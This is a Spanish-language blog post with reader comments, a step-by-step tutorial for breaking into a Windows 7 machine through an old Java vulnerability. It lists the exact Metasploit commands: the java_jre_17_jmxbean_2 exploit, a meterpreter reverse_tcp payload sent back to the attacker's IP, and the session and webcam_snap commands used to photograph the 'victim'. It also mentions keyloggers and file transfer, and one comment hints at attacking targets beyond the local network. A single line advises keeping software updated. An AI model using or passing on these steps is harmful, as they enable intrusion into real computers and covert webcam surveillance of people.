martes, 22 de abril de 2014

Hackear webcam windows 7


Hoy os traigo algo muy parecido a hacking Windows 7 entero con metasploit y los cursos de metasploit realizados, hoy quería compartiros un ataque a través de una vulnerabilidad de Java en vez de tener que crear un ejecutable .exe como hicimos en uno de los mencionados anteriormente.

Fácil, sencillo y para toda toda la familia, como dice el de Bricomania.


¿Que necesitamos? Un equipo con Windows 7 con Java 7.11 o inferior y un equipo con Kali Linux que estén en la misma red.


Para saber la versión de java escribimos en el inicio de windows: javaws -viewer
Java 7.11 

Empezamos!! 

Lo primero que hacemos es realizar un escaneo de puertos con Nmap para saber mas de nuestra victima.
Escaneo a nuestro objetivo con Zenmap



Una vez tenemos ya estudiado a nuestro objetivo preparamos la artilleria, para ello usaremos Metasploit, yo usare Kali Linux pero podeis usar vuestro sistema operativo preferido.


Lo primero es aconsejable actualizarlo: msfupdate



Abrimos metasploit con: msfconsole

kali linux metasploit

Usaremos un exploit de Java que afecta a las versiones Java 7 actualización 11. Similar al skeleton. search jmxbean
buscar metasploit

Empezamos a configurar el exploit:
use exploit/multi/browser/java_jre_17_jmxbean_2 
set srvhost 192.168.1.67 (Ip del atacante)
set target 1 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.67

Y le damos fuego: exploit, ahora se levanta el servidor y esperara una petición por el puerto 80.


Cuando se este conectando veremos que existe interactuación entre ambas maquinas y la victima esta solicitando la pagina del servidor.
Victima accediendo a la web que nos indica metasploit

Una vez lo tengamos escribimos sessions -i 1, y conseguiremos la consola de meterpreter para que podamos empezar a jugar.
exploit java windows 7


Llegados a este punto tenéis una consola en su equipo, con lo que podemos hacer prácticamente de todo con su ordenador: Keyloggers, abrir puertos, acceder a su webcam, subir y descargar archivos....

Ahora vamos a acceder a su webcam: webcam_snap
victima cazada metasploit
Fotografía de la victima


Y ahora podéis ver esta lista de comandos para poner todo su potencial en practica.


¿Como me protejo de este ataque? Las actualizaciones que tanto os molestan sirven para parchear estos problemas de seguridad, con lo que ten siempre tu software actualizado a la ultima versión estable.

Saludos guerreros!!

3 comentarios:

  1. para poder acceder hay q estar conectado en la misma red de la victima??

    ResponderEliminar
  2. Si Gabriel, este ataque esta pensado como laboratorio en Red local. Pero se podría hacer fuera de la red con algún servicio como no-ip para que pivotara entre ambos puntos, hasta aquí puedo decir ;)

    ResponderEliminar
  3. Hola a todos me podéis decir a que vulnerabilidad corresponde este exploit este decir del tipo CV-2013-0422

    ResponderEliminar